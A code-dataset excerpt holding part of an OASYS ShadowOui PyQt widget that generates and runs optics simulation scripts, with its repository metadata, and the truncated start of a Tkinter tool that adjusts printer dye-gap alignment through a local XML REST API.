setup_v_box.addWidget(self.save_button)\n \n setup_v_box.addStretch()\n \n# =============================================================================\n# Create python script section\n# =============================================================================\n self.scr_entry = QTextEdit()\n \n self.scr_console = PythonConsole(self.__dict__, self)\n \n scr_v_box = QVBoxLayout()\n scr_v_box.setContentsMargins(5, 5, 5, 5)\n \n scr_v_box.addWidget(scr_label)\n scr_v_box.addWidget(self.scr_entry, 3)\n scr_v_box.addWidget(self.scr_console)\n \n # Add more layouts to main grid\n main_grid.addLayout(setup_v_box, 0, 0, 1, 1)\n main_grid.addLayout(scr_v_box, 0, 1, 1, 4)\n \n self.setLayout(main_grid)\n \n \n def clearLayout(self, layout):\n while layout.count():\n child = layout.takeAt(0)\n if child.widget():\n child.widget().deleteLater()\n \n def update_script(self):\n try:\n self.scr_entry.setText(str(funcs.make_python_script_from_list(self.element_list)))\n except:\n self.scr_entry.setText(\"Problem in writing python script:\\n\" + str(sys.exc_info()[0]) + \": \" + str(sys.exc_info()[1]))\n \n \n def execute_script(self):\n self._script = str(self.scr_entry.toPlainText())\n self.scr_console.write(\"\\nRunning script:\\n\")\n self.scr_console.push(\"exec(_script)\")\n self.scr_console.new_prompt(sys.ps1)\n # FIXME: add optlnls as a required package (fix console error)\n\n\n def save_script(self):\n file_name = QFileDialog.getSaveFileName(self, \"Save File to Disk\", \".\", \"*.py\")[0]\n\n if not file_name is None:\n if not file_name.strip() == \"\":\n file = open(file_name, \"w\")\n file.write(str(self.scr_entry.toPlainText()))\n file.close()\n\n QtWidgets.QMessageBox.information(self, \"QMessageBox.information()\",\n \"File \" + file_name + \" written to disk\",\n QtWidgets.QMessageBox.Ok)\n \n def setBeam(self, beam):\n if ShadowCongruence.checkEmptyBeam(beam):\n if ShadowCongruence.checkGoodBeam(beam):\n\n # TODO: Code detection for more elements\n #\n # Crystals done\n # Gratings done\n # Lenses \n # CRL \n # KB (?) \n # Transfocators \n # \n # Compound elements must be broken into more elements\n\n # TODO: If element_list is not empty, do not create new elements, just reuse the existing ones\n # \n # 1. old_list, new_list\n # 2. if new_list == old_list, old_list = new_list\n # 3. if new_list != old_list, check each element and compare hybrid parameters\n \n self.input_beam = beam \n \n if 'element_list' in globals():\n pass\n else:\n self.element_list = []\n \n self.scr_entry.setText('')\n \n for history_element in self.input_beam.getOEHistory():\n temp_list = []\n name = history_element._widget_class_name\n \n if not history_element._shadow_source_start is None:\n new = classes.ElementSetup(name, 0, 0)\n temp_list.append(new)\n temp_list.append(history_element._shadow_source_start.src)\n \n self.element_list.append(temp_list)\n \n elif not history_element._shadow_oe_start is None:\n \n ### TODO: This section must be optimized (credo, que gambiarra) \n ### Improvements: check if element contains a list and break it into multiple elements\n if type(history_element._shadow_oe_start) is ShadowCompoundOpticalElement:\n \n new_list = []\n #if isinstance(history_element._shadow_oe_start, (Shadow.CompoundOE,Shadow.ShadowLibExtensions.CompoundOE)):\n new_list.extend(history_element._shadow_oe_start._oe.list)\n \n # TODO: Improve parameter detection for 'Hybridable' Compound Optical Elements.\n # Hybrid configuration window probably need to be different. For each case (sadness and sorrow)\n if 'Lens' in name or 'CRL' in name or 'Transfocator' in name: can = True\n else: can = False\n \n new = classes.ElementSetup(name, 0, 0, can_hybrid=can)\n for i in new_list:\n temp_list = [new, i]\n self.element_list.append(temp_list)\n \n else:\n distance = history_element._shadow_oe_start._oe.T_IMAGE\n focallength = history_element._shadow_oe_start._oe.SIMAG\n \n if 'Crystal' in name or 'Zone Plate' in name: can = False\n else: can = True\n \n new = classes.ElementSetup(name, distance, focallength, can_hybrid=can)\n temp_list.append(new)\n temp_list.append(history_element._shadow_oe_start._oe)\n \n self.element_list.append(temp_list)\n \n self.vbox.addWidget(new)\n self.vbox.addStretch()\n\n try:\n self.scr_entry.setText(str(funcs.make_python_script_from_list(self.element_list)))\n except:\n self.scr_entry.setText(\"Problem in writing python script:\\n\" + str(sys.exc_info()[0]) + \": \" + str(sys.exc_info()[1]))\n else:\n QtWidgets.QMessageBox.critical(self, \"Error\",\n \"Data not displayable: No good rays or bad content\",\n QtWidgets.QMessageBox.Ok)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = HybridInfo()\n sys.exit(app.exec_())", "repo_name": "oasys-lnls-kit/OASYS1-LNLS-ShadowOui", "sub_path": "orangecontrib/shadow/lnls/widgets/utility/ow_hybridinfo_widget.py", "file_name": "ow_hybridinfo_widget.py", "file_ext": "py", "file_size_in_byte": 11022, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oasys.widgets.widget.OWWidget", "line_number": 36, "usage_type": "attribute"}, {"api_name": "oasys.widgets.widget", "line_number": 36, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.util.shadow_objects.ShadowBeam", "line_number": 49, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.desktop", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 67, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 72, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 85, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 88, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 89, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignCenter", "line_number": 90, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 90, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 91, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignLeft", "line_number": 93, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 93, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 98, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 103, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 104, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QScrollArea", "line_number": 106, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 117, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 118, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 119, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 134, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.util.python_script.PythonConsole", "line_number": 136, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 138, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.funcs.make_python_script_from_list", "line_number": 160, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.funcs", "line_number": 160, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 162, "usage_type": "call"}, {"api_name": "sys.ps1", "line_number": 169, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getSaveFileName", "line_number": 174, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 174, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.information", "line_number": 182, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 182, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 182, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 184, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 184, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.util.shadow_util.ShadowCongruence.checkEmptyBeam", "line_number": 187, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.util.shadow_util.ShadowCongruence", "line_number": 187, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.util.shadow_util.ShadowCongruence.checkGoodBeam", "line_number": 188, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.util.shadow_util.ShadowCongruence", "line_number": 188, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes.ElementSetup", "line_number": 221, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes", "line_number": 221, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.util.shadow_objects.ShadowCompoundOpticalElement", "line_number": 231, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes.ElementSetup", "line_number": 242, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes", "line_number": 242, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes.ElementSetup", "line_number": 254, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.classes", "line_number": 254, "usage_type": "name"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.funcs.make_python_script_from_list", "line_number": 264, "usage_type": "call"}, {"api_name": "orangecontrib.shadow.lnls.widgets.utility.info.funcs", "line_number": 264, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 266, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.critical", "line_number": 268, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 268, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 268, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 270, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 270, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 273, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 273, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 275, "usage_type": "call"}]} +{"seq_id": "42619411626", "text": "#!/usr/bin/python3\n# Author: Ronny Toribio\n# Project: Dye Gap Adjustment Tool\n# Description: A dye gap adjustment tool that uses an XML REST API and apa_data.xml.\nimport os\nimport os.path\nfrom time import sleep\n\nimport_errors = 0\ntry:\n import tkinter as tk\n import tkinter.ttk as ttk\n from tkinter import filedialog\n from tkinter import messagebox\nexcept:\n print(\"The tkinter module is not installed.\")\n import_errors += 1\ntry:\n from requests import post, get\nexcept:\n print(\"The requests module is not installed.\")\n import_errors += 1\nif import_errors:\n exit(1)\n\nDEFAULT_STATUS = \" Reading current dye values.\"\nFILE_LOAD_SUCCESSFULL = \" The apa_data.xml file was loaded successfully.\"\nFILE_SAVE_SUCCESSFULL = \" The changes were saved successfully.\"\nFILE_SAVE_UNSUCCESSFULL = \"The changes could not be saved.\"\nUNSAVED_CHANGES = \" There are unsaved changes.\"\nPRINTER_IP = \"127.0.0.1\"\nRAW_SET_DYE_COMMAND = \"\\r\\n\"\nRAW_SET_DYE_COMMAND += \"\\t\\r\\n\"\nRAW_SET_DYE_COMMAND += \"\\t18\\r\\n\"\nRAW_SET_DYE_COMMAND += \"\\toem_set_alignment_values 0 ,0,{},{},{},{}\\r\\n\"\nRAW_SET_DYE_COMMAND += \"\\r\\n\"\n\nGAP_VALUE_RANGE = [\n -200, -192, -184, -176, -168,\n -160, -152, -144, -136, -128,\n -120, -112, -104, -96, -88,\n -80, -72, -64, -56, -48,\n -40, -32, -24, -16, -8,\n 0,\n 8, 16, 24, 32, 40,\n 48, 56, 64, 72, 80,\n 88, 96, 104, 112, 120,\n 128, 136, 144, 152, 160,\n 168, 176, 184, 192, 200\n]\n\n\ndef last_print_value(dye):\n if dye == 0:\n return 1200\n else:\n return 19200\n\n\ndef get_raw_line_values(line):\n new_line = str()\n for c in line:\n if c in \"0123456789,\":\n new_line += c\n return new_line.split(\",\")\n\n\ndef set_dye(dye, color, value):\n success = False\n xml = RAW_SET_DYE_COMMAND.format(dye, color, value, last_print_value(dye))\n headers = {}\n headers[\"Accept\"] = \"*/*\"\n headers[\"Content-Type\"] = \"text/xml; charset=UTF-8\"\n headers[\"User-Agent\"] = \"MERONG(0.9/;p)\"\n headers[\"Host\"] = f\"{PRINTER_IP}:8080\"\n headers[\"Content-Length\"] = str(len(xml))\n headers[\"Connection\"] = \"Keep-Alive\"\n headers[\"Cache-Control\"] = \"no-cache\"\n r = post(f\"http://{PRINTER_IP}:8080/OemsiMediapath/Function\", headers=headers, data=xml)\n if r.status_code != 200:\n messagebox.showinfo(\"set_dye() error\", f\"HTTP response code is {r.status_code}\")\n elif \"text/xml\" in r.headers[\"Content-Type\"]:\n content = r.content.decode()\n if \"0\" in content:\n success = True\n return success\n\n\nclass DyeGapAdjustmentTool:\n has_changed = False\n def __init__(self):\n self.root = tk.Tk()\n width = 418\n height = 355\n screen_wcenter = int((self.root.winfo_screenwidth() / 2) - (width / 2))\n screen_hcenter = int((self.root.winfo_screenheight() / 2) - (height / 2))\n self.root.geometry(f\"{width}x{height}+{screen_wcenter}+{screen_hcenter}\")\n self.root.resizable(False, False)\n self.root.title(\"Dye Gap Adjustment Tool\")\n\n # Keyboard Shortcuts\n self.root.bind(\"\", lambda e: self.load_APA_file())\n self.root.bind(\"\", lambda e: self.load_APA_file())\n self.root.bind(\"\", lambda e: self.save_changes())\n self.root.bind(\"\", lambda e: self.root.quit())\n\n # Menu Bar\n self.menubar = tk.Menu(self.root)\n self.filemenu = tk.Menu(self.menubar, tearoff=0)\n self.filemenu.add_command(label=\"Open\", command=self.load_APA_file, accelerator=\"Ctrl+O\")\n self.filemenu.add_command(label=\"Save\", command=self.save_changes, accelerator=\"Ctrl+S\")\n self.filemenu.add_separator()\n self.filemenu.add_command(label=\"Exit\", command=self.root.quit, accelerator=\"Ctrl+Q\")\n self.menubar.add_cascade(label=\"File\", menu=self.filemenu)\n self.helpmenu = tk.Menu(self.menubar, tearoff=0)\n self.helpmenu.add_command(label=\"About\", command=lambda: messagebox.showinfo(\"About\", \"Dye Gap Adjustment Tool\\nDeveloped by Ronny Toribio.\"))\n self.menubar.add_cascade(label=\"Help\", menu=self.helpmenu)\n self.root.config(menu=self.menubar)\n\n # Main Panels\n self.dyes_panel = tk.Frame(self.root)\n self.dyes_panel.pack()\n self.button_panel = tk.Frame(self.root)\n self.button_panel.pack(padx=20, pady=20)\n self.status_panel = tk.Frame(self.root)\n self.status_panel.pack(side=tk.BOTTOM, fill=tk.X)\n\n # Status Bar\n self.statusVar = tk.StringVar()\n self.statusBar = tk.Label(self.status_panel, textvariable=self.statusVar, bd=1, width=59, relief=tk.SUNKEN, anchor=tk.W, font=(\"arial\", 10, \"normal\"))\n self.statusBar.pack()\n self.statusVar.set(DEFAULT_STATUS)\n\n # Dye 0\n self.dye_0_var = tk.IntVar()\n self.dye_0_var.set(0)\n self.dye_0_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 0\")\n self.dye_0_panel.grid(column=0, row=0, padx=5, pady=5)\n self.dye_0_lab = tk.Label(self.dye_0_panel, width=4, textvariable=self.dye_0_var)\n self.dye_0_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_0_inc = tk.Button(self.dye_0_panel, text=\"U\", command=self.increment_dye_0)\n self.dye_0_inc.grid(column=1, row=0)\n self.dye_0_inc[\"state\"] = \"disable\"\n self.dye_0_dec = tk.Button(self.dye_0_panel, text=\"D\", command=self.decrement_dye_0)\n self.dye_0_dec.grid(column=1, row=1)\n self.dye_0_dec[\"state\"] = \"disable\"\n\n # Dye 1\n self.dye_1_var = tk.IntVar()\n self.dye_1_var.set(0)\n self.dye_1_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 1\")\n self.dye_1_panel.grid(column=1, row=0, padx=5, pady=5)\n self.dye_1_lab = tk.Label(self.dye_1_panel, width=4, textvariable=self.dye_1_var)\n self.dye_1_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_1_inc = tk.Button(self.dye_1_panel, text=\"U\", command=self.increment_dye_1)\n self.dye_1_inc.grid(column=1, row=0)\n self.dye_1_inc[\"state\"] = \"disable\"\n self.dye_1_dec = tk.Button(self.dye_1_panel, text=\"D\", command=self.decrement_dye_1)\n self.dye_1_dec.grid(column=1, row=1)\n self.dye_1_dec[\"state\"] = \"disable\"\n\n # Dye 2\n self.dye_2_var = tk.IntVar()\n self.dye_2_var.set(0)\n self.dye_2_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 2\")\n self.dye_2_panel.grid(column=2, row=0, padx=5, pady=5)\n self.dye_2_lab = tk.Label(self.dye_2_panel, width=4, textvariable=self.dye_2_var)\n self.dye_2_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_2_inc = tk.Button(self.dye_2_panel, text=\"U\", command=self.increment_dye_2)\n self.dye_2_inc.grid(column=1, row=0)\n self.dye_2_inc[\"state\"] = \"disable\"\n self.dye_2_dec = tk.Button(self.dye_2_panel, text=\"D\", command=self.decrement_dye_2)\n self.dye_2_dec.grid(column=1, row=1)\n self.dye_2_dec[\"state\"] = \"disable\"\n\n # Dye 3\n self.dye_3_var = tk.IntVar()\n self.dye_3_var.set(0)\n self.dye_3_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 3\")\n self.dye_3_panel.grid(column=3, row=0, padx=5, pady=5)\n self.dye_3_lab = tk.Label(self.dye_3_panel, width=4, textvariable=self.dye_3_var)\n self.dye_3_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_3_inc = tk.Button(self.dye_3_panel, text=\"U\", command=self.increment_dye_3)\n self.dye_3_inc.grid(column=1, row=0)\n self.dye_3_inc[\"state\"] = \"disable\"\n self.dye_3_dec = tk.Button(self.dye_3_panel, text=\"D\", command=self.decrement_dye_3)\n self.dye_3_dec.grid(column=1, row=1)\n self.dye_3_dec[\"state\"] = \"disable\"\n\n # Dye 4\n self.dye_4_var = tk.IntVar()\n self.dye_4_var.set(0)\n self.dye_4_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 4\")\n self.dye_4_panel.grid(column=4, row=0, padx=5, pady=5)\n self.dye_4_panel.grid_propagate(1)\n self.dye_4_lab = tk.Label(self.dye_4_panel, width=4, textvariable=self.dye_4_var)\n self.dye_4_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_4_inc = tk.Button(self.dye_4_panel, text=\"U\", command=self.increment_dye_4)\n self.dye_4_inc.grid(column=1, row=0)\n self.dye_4_inc[\"state\"] = \"disable\"\n self.dye_4_dec = tk.Button(self.dye_4_panel, text=\"D\", command=self.decrement_dye_4)\n self.dye_4_dec.grid(column=1, row=1)\n self.dye_4_dec[\"state\"] = \"disable\"\n\n # Dye 5\n self.dye_5_var = tk.IntVar()\n self.dye_5_var.set(0)\n self.dye_5_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 5\")\n self.dye_5_panel.grid(column=0, row=1, padx=5, pady=5)\n self.dye_5_lab = tk.Label(self.dye_5_panel, width=4, textvariable=self.dye_5_var)\n self.dye_5_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_5_inc = tk.Button(self.dye_5_panel, text=\"U\", command=self.increment_dye_5)\n self.dye_5_inc.grid(column=1, row=0)\n self.dye_5_inc[\"state\"] = \"disable\"\n self.dye_5_dec = tk.Button(self.dye_5_panel, text=\"D\", command=self.decrement_dye_5)\n self.dye_5_dec.grid(column=1, row=1)\n self.dye_5_dec[\"state\"] = \"disable\"\n\n # Dye 6\n self.dye_6_var = tk.IntVar()\n self.dye_6_var.set(0)\n self.dye_6_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 6\")\n self.dye_6_panel.grid(column=1, row=1, padx=5, pady=5)\n self.dye_6_lab = tk.Label(self.dye_6_panel, width=4, textvariable=self.dye_6_var)\n self.dye_6_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_6_inc = tk.Button(self.dye_6_panel, text=\"U\", command=self.increment_dye_6)\n self.dye_6_inc.grid(column=1, row=0)\n self.dye_6_inc[\"state\"] = \"disable\"\n self.dye_6_dec = tk.Button(self.dye_6_panel, text=\"D\", command=self.decrement_dye_6)\n self.dye_6_dec.grid(column=1, row=1)\n self.dye_6_dec[\"state\"] = \"disable\"\n\n # Dye 7\n self.dye_7_var = tk.IntVar()\n self.dye_7_var.set(0)\n self.dye_7_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 7\")\n self.dye_7_panel.grid(column=2, row=1, padx=5, pady=5)\n self.dye_7_lab = tk.Label(self.dye_7_panel, width=4, textvariable=self.dye_7_var)\n self.dye_7_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_7_inc = tk.Button(self.dye_7_panel, text=\"U\", command=self.increment_dye_7)\n self.dye_7_inc.grid(column=1, row=0)\n self.dye_7_inc[\"state\"] = \"disable\"\n self.dye_7_dec = tk.Button(self.dye_7_panel, text=\"D\", command=self.decrement_dye_7)\n self.dye_7_dec.grid(column=1, row=1)\n self.dye_7_dec[\"state\"] = \"disable\"\n\n # Dye 8\n self.dye_8_var = tk.IntVar()\n self.dye_8_var.set(0)\n self.dye_8_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 8\")\n self.dye_8_panel.grid(column=3, row=1, padx=5, pady=5)\n self.dye_8_lab = tk.Label(self.dye_8_panel, width=4, textvariable=self.dye_8_var)\n self.dye_8_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_8_inc = tk.Button(self.dye_8_panel, text=\"U\", command=self.increment_dye_8)\n self.dye_8_inc.grid(column=1, row=0)\n self.dye_8_inc[\"state\"] = \"disable\"\n self.dye_8_dec = tk.Button(self.dye_8_panel, text=\"D\", command=self.decrement_dye_8)\n self.dye_8_dec.grid(column=1, row=1)\n self.dye_8_dec[\"state\"] = \"disable\"\n\n # Dye 9\n self.dye_9_var = tk.IntVar()\n self.dye_9_var.set(0)\n self.dye_9_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 9\")\n self.dye_9_panel.grid(column=4, row=1, padx=5, pady=5)\n self.dye_9_lab = tk.Label(self.dye_9_panel, width=4, textvariable=self.dye_9_var)\n self.dye_9_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_9_inc = tk.Button(self.dye_9_panel, text=\"U\", command=self.increment_dye_9)\n self.dye_9_inc.grid(column=1, row=0)\n self.dye_9_inc[\"state\"] = \"disable\"\n self.dye_9_dec = tk.Button(self.dye_9_panel, text=\"D\", command=self.decrement_dye_9)\n self.dye_9_dec.grid(column=1, row=1)\n self.dye_9_dec[\"state\"] = \"disable\"\n\n # Dye 10\n self.dye_10_var = tk.IntVar()\n self.dye_10_var.set(0)\n self.dye_10_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 10\")\n self.dye_10_panel.grid(column=0, row=2, padx=5, pady=5)\n self.dye_10_lab = tk.Label(self.dye_10_panel, width=4, textvariable=self.dye_10_var)\n self.dye_10_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_10_inc = tk.Button(self.dye_10_panel, text=\"U\", command=self.increment_dye_10)\n self.dye_10_inc.grid(column=1, row=0)\n self.dye_10_inc[\"state\"] = \"disable\"\n self.dye_10_dec = tk.Button(self.dye_10_panel, text=\"D\", command=self.decrement_dye_10)\n self.dye_10_dec.grid(column=1, row=1)\n self.dye_10_dec[\"state\"] = \"disable\"\n\n # Dye 11\n self.dye_11_var = tk.IntVar()\n self.dye_11_var.set(0)\n self.dye_11_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 11\")\n self.dye_11_panel.grid(column=1, row=2, padx=5, pady=5)\n self.dye_11_lab = tk.Label(self.dye_11_panel, width=4, textvariable=self.dye_11_var)\n self.dye_11_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_11_inc = tk.Button(self.dye_11_panel, text=\"U\", command=self.increment_dye_11)\n self.dye_11_inc.grid(column=1, row=0)\n self.dye_11_inc[\"state\"] = \"disable\"\n self.dye_11_dec = tk.Button(self.dye_11_panel, text=\"D\", command=self.decrement_dye_11)\n self.dye_11_dec.grid(column=1, row=1)\n self.dye_11_dec[\"state\"] = \"disable\"\n\n # Dye 12\n self.dye_12_var = tk.IntVar()\n self.dye_12_var.set(0)\n self.dye_12_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 12\")\n self.dye_12_panel.grid(column=2, row=2, padx=5, pady=5)\n self.dye_12_lab = tk.Label(self.dye_12_panel, width=4, textvariable=self.dye_12_var)\n self.dye_12_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_12_inc = tk.Button(self.dye_12_panel, text=\"U\", command=self.increment_dye_12)\n self.dye_12_inc.grid(column=1, row=0)\n self.dye_12_inc[\"state\"] = \"disable\"\n self.dye_12_dec = tk.Button(self.dye_12_panel, text=\"D\", command=self.decrement_dye_12)\n self.dye_12_dec.grid(column=1, row=1)\n self.dye_12_dec[\"state\"] = \"disable\"\n\n # Dye 13\n self.dye_13_var = tk.IntVar()\n self.dye_13_var.set(0)\n self.dye_13_panel = ttk.LabelFrame(self.dyes_panel, text=\"Dye 13\")\n self.dye_13_panel.grid(column=3, row=2, padx=5, pady=5)\n self.dye_13_lab = tk.Label(self.dye_13_panel, width=4, textvariable=self.dye_13_var)\n self.dye_13_lab.grid(column=0, row=0, ipadx=2, ipady=2)\n self.dye_13_inc = tk.Button(self.dye_13_panel, text=\"U\", command=self.increment_dye_13)\n self.dye_13_inc.grid(column=1, row=0)\n self.dye_13_inc[\"state\"] = \"disable\"\n self.dye_13_dec = tk.Button(self.dye_13_panel, text=\"D\", command=self.decrement_dye_13)\n self.dye_13_dec.grid(column=1, row=1)\n self.dye_13_dec[\"state\"] = \"disable\"\n\n # Dye Variables List\n self.dye_vars = [self.dye_0_var,\n self.dye_1_var,\n self.dye_2_var,\n self.dye_3_var,\n self.dye_4_var,\n self.dye_5_var,\n self.dye_6_var,\n self.dye_7_var,\n self.dye_8_var,\n self.dye_9_var,\n self.dye_10_var,\n self.dye_11_var,\n self.dye_12_var,\n self.dye_13_var]\n\n # Changed Dyes Set\n self.changed_dyes = set()\n\n # Operation Buttons\n self.load_button = tk.Button(self.button_panel, text=\"Load File\", command=self.load_APA_file)\n self.load_button.grid(column=0, row=6)\n self.save_button = tk.Button(self.button_panel, text=\"Apply Changes\", command=self.save_changes)\n self.save_button.grid(column=1, row=6)\n self.save_button[\"state\"] = \"disabled\"\n\n # Increase/Decrease Button Images\n if os.path.exists(\"tri-up.png\") and os.path.exists(\"tri-down.png\"):\n tri_up = tk.PhotoImage(file=\"tri-up.png\")\n tri_down = tk.PhotoImage(file=\"tri-down.png\")\n self.dye_0_inc.configure(image=tri_up, text=\"\")\n self.dye_0_dec.configure(image=tri_down, text=\"\")\n self.dye_0_inc.image = tri_up\n self.dye_0_dec.image = tri_down\n self.dye_1_inc.configure(image=tri_up, text=\"\")\n self.dye_1_dec.configure(image=tri_down, text=\"\")\n self.dye_1_inc.image = tri_up\n self.dye_1_dec.image = tri_down\n self.dye_2_inc.configure(image=tri_up, text=\"\")\n self.dye_2_dec.configure(image=tri_down, text=\"\")\n self.dye_2_inc.image = tri_up\n self.dye_2_dec.image = tri_down\n self.dye_3_inc.configure(image=tri_up, text=\"\")\n self.dye_3_dec.configure(image=tri_down, text=\"\")\n self.dye_3_inc.image = tri_up\n self.dye_3_dec.image = tri_down\n self.dye_4_inc.configure(image=tri_up, text=\"\")\n self.dye_4_dec.configure(image=tri_down, text=\"\")\n self.dye_4_inc.image = tri_up\n self.dye_4_dec.image = tri_down\n self.dye_5_inc.configure(image=tri_up, text=\"\")\n self.dye_5_dec.configure(image=tri_down, text=\"\")\n self.dye_5_inc.image = tri_up\n self.dye_5_dec.image = tri_down\n self.dye_6_inc.configure(image=tri_up, text=\"\")\n self.dye_6_dec.configure(image=tri_down, text=\"\")\n self.dye_6_inc.image = tri_up\n self.dye_6_dec.image = tri_down\n self.dye_7_inc.configure(image=tri_up, text=\"\")\n self.dye_7_dec.configure(image=tri_down, text=\"\")\n self.dye_7_inc.image = tri_up\n self.dye_7_dec.image = tri_down\n self.dye_8_inc.configure(image=tri_up, text=\"\")\n self.dye_8_dec.configure(image=tri_down, text=\"\")\n self.dye_8_inc.image = tri_up\n self.dye_8_dec.image = tri_down\n self.dye_9_inc.configure(image=tri_up, text=\"\")\n self.dye_9_dec.configure(image=tri_down, text=\"\")\n self.dye_9_inc.image = tri_up\n self.dye_9_dec.image = tri_down\n self.dye_10_inc.configure(image=tri_up, text=\"\")\n self.dye_10_dec.configure(image=tri_down, text=\"\")\n self.dye_10_inc.image = tri_up\n self.dye_10_dec.image = tri_down\n self.dye_11_inc.configure(image=tri_up, text=\"\")\n self.dye_11_dec.configure(image=tri_down, text=\"\")\n self.dye_11_inc.image = tri_up\n self.dye_11_dec.image = tri_down\n self.dye_12_inc.configure(image=tri_up, text=\"\")\n self.dye_12_dec.configure(image=tri_down, text=\"\")\n self.dye_12_inc.image = tri_up\n self.dye_12_dec.image = tri_down\n self.dye_13_inc.configure(image=tri_up, text=\"\")\n self.dye_13_dec.configure(image=tri_down, text=\"\")\n self.dye_13_inc.image = tri_up\n self.dye_13_dec.image = tri_down\n\n def mark_change(self):\n self.has_changed = True\n self.statusVar.set(UNSAVED_CHANGES)\n self.statusBar.configure(fg=\"black\")\n \n def increment_dye_0(self):\n val = self.dye_0_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_0_var.set(val + 8)\n self.changed_dyes.add(0)\n self.mark_change()\n\n def decrement_dye_0(self):\n val = self.dye_0_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_0_var.set(val - 8)\n self.changed_dyes.add(0)\n 